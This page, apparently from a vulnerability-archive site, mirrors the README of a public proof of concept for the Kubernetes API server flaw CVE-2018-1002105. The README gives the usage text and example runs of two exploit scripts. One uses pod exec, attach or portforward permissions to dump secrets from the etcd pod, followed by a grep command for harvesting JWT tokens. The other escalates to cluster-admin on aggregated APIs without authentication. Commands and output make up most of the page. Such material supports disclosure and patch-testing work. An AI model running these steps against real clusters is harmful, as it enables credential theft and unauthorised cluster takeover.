Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-1002105 PoC — Google Kubernetes 权限许可和访问控制漏洞

Source
https://github.com/evict/poc_CVE-2018-1002105
Associated Vulnerability
Title:Google Kubernetes 权限许可和访问控制漏洞 (CVE-2018-1002105)
Description:In all Kubernetes versions prior to v1.10.11, v1.11.5, and v1.12.3, incorrect handling of error responses to proxied upgrade requests in the kube-apiserver allowed specially crafted requests to establish a connection through the Kubernetes API server to backend servers, then send arbitrary requests over the same connection directly to the backend, authenticated with the Kubernetes API server's TLS credentials used to establish the backend connection.
Description
PoC for CVE-2018-1002105.
Readme
# CVE-2018-1002105 PoC

* [Authenticated PoC](#authenticated-poc)
    * [Demo](#demo)
    * [Usage](#usage)
* [Unauthenticated PoC](#unauthenticated-poc)
    * [Demo](#demo-1)
    * [Usage](#usage-1)


## Authenticated PoC
Proof-of-Concept exploit for CVE-2018-1002105. The current exploit requires `create` and `get` privileges on `pods` and `pods/exec`. Support has been added for `portforward` and `attach`, which require similar permissions. 

The current PoC dumps the secrets from the default `etcd-kubernetes` pod.

### Demo
The PoC in action:

[![asciicast](https://asciinema.org/a/kubSrehAf14K7MQ9aZw2RpCYd.svg)](https://asciinema.org/a/kubSrehAf14K7MQ9aZw2RpCYd)

### Usage

```bash
usage: poc.py [-h] --target TARGET --jwt TOKEN [--namespace NAMESPACE] --pod
              POD --method {exec,portforward,attach}
              [--privileged-namespace PNAMESPACE] [--privileged-pod PPOD]
              [--container CONTAINER] [--command COMMAND]
              [--filename FILENAME]

PoC for CVE-2018-1002105.

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  --target TARGET, -t TARGET
                        API server target:port
  --jwt TOKEN, -j TOKEN
                        JWT token for service account
  --namespace NAMESPACE, -n NAMESPACE
                        Namespace with method access
  --pod POD, -p POD     Pod with method access
  --method {exec,portforward,attach}, -m {exec,portforward,attach}

optional arguments:
  --privileged-namespace PNAMESPACE, -s PNAMESPACE
                        Target namespace
  --privileged-pod PPOD, -e PPOD
                        Target privileged pod
  --container CONTAINER, -c CONTAINER
                        Target container
  --command COMMAND, -x COMMAND
                        Command to execute
  --filename FILENAME, -f FILENAME
                        File to save output to

```

Example:

```bash
$ ./poc.py -t 10.0.2.15:6443 --jwt [token] -p [pod] -f etcd.out -m attach
[*] Building pipe using attach...
[+] Pipe opened :D
[*] Attempting code exec on etcd-kubernetes/etcd
[*] Writing output to etcd.out ....
[+] Done!
```

Check for tokens:

```bash
$ grep -air eyJ etcd.db
```

## Unauthenticated PoC
The unauthenticated PoC allows privilege escalation within the context of the exposed API. Depending on the functionalities of the API it might be possible to get code execution on pods. This demo currently exploits the bug to gain cluster-admin rights on the `servicecatalog.k8s.io` API. This exploit should also work for `metrics.k8s.io` or any API exposed through the aggregated layer.

### Demo
The PoC in action:

[![asciicast](https://asciinema.org/a/TjbO5p1JJN0dnNSSWhrcopn9e.svg)](https://asciinema.org/a/TjbO5p1JJN0dnNSSWhrcopn9e)

### Usage

```bash
usage: unauth_poc.py [-h] --target TARGET [--api-base BASE]
                     [--api-target TARGET_API] [--api-version VERSION]
                     [--json] [--filename FILENAME]

Unauthenticated PoC for CVE-2018-1002105

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  --target TARGET, -t TARGET
                        API server target:port
  --api-base BASE, -b BASE
                        Target API name i.e. "servicecatalog.k8s.io"
  --api-target TARGET_API, -u TARGET_API
                        API to access i.e. "clusterservicebrokers"

optional arguments:
  --api-version VERSION, -a VERSION
                        API version to use i.e. "v1beta1"
  --json, -j            Print json output
  --filename FILENAME, -f FILENAME
                        File to save output to
```

Example:

```bash
$ ./unauth_poc.py -t 10.0.2.15:6443 --json -f api.out
[*] Building pipe ...
[+] Pipe opened :D
[*] Attempting to access url
[+] Pipe opened :D
[*] Writing output to api.out ....
[+] Done!

```
File Snapshot

 [4.0K]  /data/pocs/26b0f5f14a1081cba0018cde99cfb8db48abe560
├── [1.0K]  LICENSE
├── [4.4K]  poc.py
├── [3.8K]  README.md
├── [ 127]  stage_1
├── [ 219]  stage_2
├── [4.5K]  unauth_poc.py
├── [ 151]  ustage_1
└── [ 200]  ustage_2

0 directories, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →